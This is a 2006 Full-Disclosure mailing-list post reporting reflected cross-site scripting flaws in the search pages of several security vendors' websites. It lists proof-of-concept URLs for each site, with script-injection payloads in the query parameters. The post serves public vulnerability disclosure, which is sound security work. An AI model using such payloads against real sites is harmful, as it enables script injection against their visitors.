[Full-disclosure] security vendor xss
Thomas Pollet
thomas.pollet at gmail.com
Mon Aug 7 12:27:10 BST 2006
Hello,
several security vendors still don't know how to filter html in their custom
search engines.
http://cybertrust.com/cgi-bin/htsearch?words=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://www.pandasoftware.com/com/virus_info/encyclopedia/results.aspx?termino=<script%20src=
google.com>&tipoBusqueda=vi
http://fr.trendmicro-europe.com/search/?entity=enterprise&master=true&searchword=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Greets,
Thomas
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060807/eef47f59/attachment.html
Full-Disclosure is hosted and sponsored by Secunia.